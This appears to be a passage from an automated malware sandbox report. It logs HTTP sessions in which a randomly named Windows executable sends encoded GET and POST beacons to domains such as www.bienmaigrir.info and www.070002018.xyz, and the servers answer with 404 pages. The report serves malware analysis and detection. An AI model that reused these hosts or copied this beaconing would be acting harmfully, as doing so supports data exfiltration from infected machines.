                                                                              Data Ascii: 6NVpdLF=VyR7xEiQABko00xoRAai/I7NYM3tYqGnNrwOg8mvy0HG0U0o6dCesvV9IYcGy3cCMdeaLpWdcp47ofX7YFV4sodYolEfPTUM7F9OvYZ719nHZcJLu/FmLLWsmRHKN6/551GunorAHqRNdTmVYRihFS5gHNz6oSUW9mg3w08A7R8AH+58t4ZFZjZrA3q9kwTUs0kTdxCTDTNn1CPcJFIyexnXIHjmr1KowhBKCiVzj+XB33yW6Gl0CYcv17iv5e3H6XfJUklQ0WOd71FytnZs2nZBdKWIBrOX16hFwTgCXJ0IRnvJTHR1MwbA/XZAKMJxU6IZFzFENUB5eY05SSmV2D1KmCF0YnN2RGYvIL7egn2m53Bi4zAhcWC1PjY6z8+nh6U05WST5m8MPTtJnV9Oj32ixkEQDtCFOOhT2ZvTvQ8c0bgde2Og7Q2tpXMg5NK5qnkvpwk8mWKmwRnENTwXhaqyyT6DCaKKXiU3CBGSyjFgVtI9/H8bF7h+eY5EesNgzsAYYukEMWRQfC+fCmW7FB4QwEZb8843G5JP5vPbf+HMtcyfJxqBpV0SjERer/cAITkGsnm/EYWzKAiC/gfsXJ9R2ndoU0YO4TsYLNjB1MBb7fcUbEjzmRwznMnVOAt94nv2VF98SXK27v0c/1CXwQDDSNoEZzS+C7Pa+xoFZblCHYd0Xf0Z83KjDciH6DtR60Wcq8vqaqH6VRxZwaWYMjTh37txYV9n1QaxPO03gBUo0NdZTYfLeywJFBF2y6llCV4bBaMhi3BYWPoeE0fhC2kM7cBYgnIp32MqkkiipGFNS1t/rhQCcRiVC9FciYbmdUuTwhYag5s5QPzMLe27g4PzROHkVtnT3hXeU6B+Ub5B+wfp2HjLwQJws1hkV0m9C1Dw1Zh9i9IijmTmwlSLfAkjgY1eYTjFjPkTk0jE6UTEdlpFXSgXUgCMo4ht+YRRcQpC/4yWaVZyvhy6DNIlgvToqiVgPvqkomqj/19deIGv [TRUNCATED]
                                                                              Dec 2, 2024 14:45:00.539998055 CET1236INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:00 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              ETag: W/"66cce1df-b96"
                                                                              Content-Encoding: gzip
                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                              Dec 2, 2024 14:45:00.540040970 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.1049997161.97.142.144806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:01.880819082 CET356OUTGET /6m2n/?6NVpdLF=Yw5byyKwEzNx0WEyNQXxwK69B8+8B5LUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0ur9kqRkxGnQ62VRV775xzcXmQMlZyg==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.070002018.xyz
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:03.208888054 CET1236INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:03 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 2966
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              ETag: "66cce1df-b96"
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                              Dec 2, 2024 14:45:03.208905935 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                              Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                              Dec 2, 2024 14:45:03.208923101 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                              Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.104999835.220.176.144806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:09.718020916 CET628OUTPOST /7yhf/ HTTP/1.1
                                                                              Host: www.bienmaigrir.info
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bienmaigrir.info
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bienmaigrir.info/7yhf/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 44 48 51 4a 32 75 6b 72 4d 59 69 44 63 72 4c 54 39 34 47 58 52 74 4b 67 76 49 2f 76 30 6d 78 78 6d 50 43 6d 48 77 66 59 72 79 78 6e 64 31 79 63 6e 47 45 51 45 4f 44 39 75 45 70 6a 32 2b 70 4d 47 6a 41 73 62 6b 44 66 77 6d 49 4f 4b 79 6e 65 4a 68 72 5a 6a 2f 34 61 54 32 39 2f 37 61 42 38 38 4e 71 55 4e 71 48 6a 79 59 36 67 63 64 66 35 78 45 32 35 75 51 4b 35 6e 58 68 30 50 68 35 74 73 50 5a 58 53 64 54 5a 7a 76 72 41 4c 4e 50 68 4f 62 45 54 2b 67 70 30 79 31 75 76 53 37 50 6f 67 77 4a 4b 42 4b 39 53 6b 64 55 4e 70 42 72 39 66 50 38 55 38 53 2f 78 35 43 70 6a
                                                                              Data Ascii: 6NVpdLF=DHQJ2ukrMYiDcrLT94GXRtKgvI/v0mxxmPCmHwfYryxnd1ycnGEQEOD9uEpj2+pMGjAsbkDfwmIOKyneJhrZj/4aT29/7aB88NqUNqHjyY6gcdf5xE25uQK5nXh0Ph5tsPZXSdTZzvrALNPhObET+gp0y1uvS7PogwJKBK9SkdUNpBr9fP8U8S/x5Cpj
                                                                              Dec 2, 2024 14:45:11.207480907 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:10 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.104999935.220.176.144806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:12.383399963 CET652OUTPOST /7yhf/ HTTP/1.1
                                                                              Host: www.bienmaigrir.info
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bienmaigrir.info
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bienmaigrir.info/7yhf/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 44 48 51 4a 32 75 6b 72 4d 59 69 44 47 4c 37 54 2b 66 71 58 5a 74 4b 6a 72 34 2f 76 37 47 78 31 6d 49 4b 6d 48 78 71 41 71 48 42 6e 65 51 4f 63 6d 45 73 51 4e 65 44 39 68 6b 70 6d 34 65 70 54 47 6a 4d 6b 62 68 37 66 77 6e 73 4f 4b 77 2f 65 56 43 54 59 69 76 34 59 65 57 39 68 6d 4b 42 38 38 4e 71 55 4e 71 54 4a 79 59 69 67 66 73 76 35 78 6c 32 2b 6a 77 4b 2b 67 58 68 30 4c 68 35 70 73 50 5a 35 53 63 65 30 7a 74 54 41 4c 4a 66 68 4f 70 38 51 6c 51 70 32 38 56 75 2f 53 59 71 48 36 78 5a 6d 4e 59 52 41 34 66 51 39 6e 41 57 36 4f 65 64 44 76 6c 6a 2f 33 45 63 4a 46 78 75 52 4d 4c 77 63 64 44 62 64 4d 59 37 6e 35 78 39 49 36 67 3d 3d
                                                                              Data Ascii: 6NVpdLF=DHQJ2ukrMYiDGL7T+fqXZtKjr4/v7Gx1mIKmHxqAqHBneQOcmEsQNeD9hkpm4epTGjMkbh7fwnsOKw/eVCTYiv4YeW9hmKB88NqUNqTJyYigfsv5xl2+jwK+gXh0Lh5psPZ5Sce0ztTALJfhOp8QlQp28Vu/SYqH6xZmNYRA4fQ9nAW6OedDvlj/3EcJFxuRMLwcdDbdMY7n5x9I6g==
                                                                              Dec 2, 2024 14:45:13.911417961 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:13 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.105000035.220.176.144806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:15.053141117 CET1665OUTPOST /7yhf/ HTTP/1.1
                                                                              Host: www.bienmaigrir.info
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bienmaigrir.info
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bienmaigrir.info/7yhf/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 44 48 51 4a 32 75 6b 72 4d 59 69 44 47 4c 37 54 2b 66 71 58 5a 74 4b 6a 72 34 2f 76 37 47 78 31 6d 49 4b 6d 48 78 71 41 71 48 4a 6e 64 69 32 63 6e 6c 73 51 58 65 44 39 6f 45 70 6e 34 65 6f 50 47 6a 55 67 62 68 2f 6c 77 6c 6b 4f 4b 52 66 65 46 7a 54 59 72 76 34 59 42 47 39 67 37 61 42 4d 38 4e 36 51 4e 71 44 4a 79 59 69 67 66 75 33 35 34 55 32 2b 77 67 4b 35 6e 58 68 43 50 68 35 52 73 4f 39 50 53 63 4b 43 76 4e 7a 41 4c 70 50 68 64 4b 45 51 70 51 70 77 78 31 76 67 53 59 57 59 36 31 35 71 4e 64 46 75 34 64 77 39 6d 30 44 7a 61 2b 46 6b 74 30 43 6d 2b 47 4e 71 57 32 57 6e 4a 76 30 62 57 52 76 55 51 72 61 37 7a 56 6b 6a 76 73 44 4f 72 74 44 54 67 79 36 54 48 69 33 65 34 74 78 76 6b 4e 56 6d 49 56 64 5a 4b 4e 35 72 36 36 37 52 4f 52 33 69 73 33 5a 47 77 4d 69 36 63 78 78 46 44 48 77 6e 50 76 48 36 42 43 4c 68 41 69 66 42 51 38 39 69 4c 50 5a 64 4c 44 62 50 34 41 74 71 37 34 6b 58 2f 2b 59 70 72 39 62 62 2f 67 57 79 65 6b 4c 65 75 59 65 32 72 44 49 54 49 61 69 72 7a 58 63 74 61 30 [TRUNCATED]
                                                                              Data Ascii: 6NVpdLF=DHQJ2ukrMYiDGL7T+fqXZtKjr4/v7Gx1mIKmHxqAqHJndi2cnlsQXeD9oEpn4eoPGjUgbh/lwlkOKRfeFzTYrv4YBG9g7aBM8N6QNqDJyYigfu354U2+wgK5nXhCPh5RsO9PScKCvNzALpPhdKEQpQpwx1vgSYWY615qNdFu4dw9m0Dza+Fkt0Cm+GNqW2WnJv0bWRvUQra7zVkjvsDOrtDTgy6THi3e4txvkNVmIVdZKN5r667ROR3is3ZGwMi6cxxFDHwnPvH6BCLhAifBQ89iLPZdLDbP4Atq74kX/+Ypr9bb/gWyekLeuYe2rDITIairzXcta0grauCEkWpX0pk3IZ7VXyP6xc1LK/BWBCAU+TQPDP5yjMNgfgd0SdRDqDGnUwE0jh2sT+ulAeZoVDftWOyI3eIcQ37Kt+Umr1EM6PGJ5MkCS8mmH2I4HyP8stpxDcjr6s9LX313fUxOOIcaxyRwjxeU1jCUH2+MqDO8s6ChkFCGp4RuLJhkLW4yng3M/6cLxpmq2cfPZCgMk4sC6ZSgq3GBdikqQ4FMFMEeDXIafzSiS7HZ0Ze94mI6mwMOn78rZNKmlKkc1juFy2Qs30SOQN53Px38xv75zDK7owsFxBXai0QBv0WjgM0AJEWD8BFNzBlmoazAbUEKTmbtryDRe9n8VHuvDt6DbSl2anSZ4Ft9uKdfCI8uArHO0CcVUqzNB65NSRWBkB7EAkWpe5WXrSP92wzRXxCvcgbxqaxs8EGbpoxEeslS7w2bpT8+9QtO8tAoB7AExoMlor8U0yfWXSJOV8uw21cObQwCzwHgFblVB8HbUIcKo6Fp/wimLlHKj8sJRClxmDtLBFimZy+icjQzon2kjcAwL/QMhBLj2Vwy7N4/gbVPYlwWfB3ot2hRYOWEJRILK7fhgaGWOk+PUBZYZQbE+mdWDf7XZ1XnLrb3aISXrCW66lSCeJrH5Ps6gGzhAPB1+J2pOgAap19nXNJoHqNk+YY/84+2 [TRUNCATED]
                                                                              Dec 2, 2024 14:45:16.625010967 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:16 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.105000135.220.176.144806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:45:17.706048965 CET359OUTGET /7yhf/?_jVx=rlV0_TQ81&6NVpdLF=OF4p1YkyIdfCe7eLhNmLS9a71obvkkx5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGro8YtWCJNiZpBxbyycKP3y6+8bNDuvw== HTTP/1.1
                                                                              Host: www.bienmaigrir.info
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:19.282972097 CET691INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:18 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
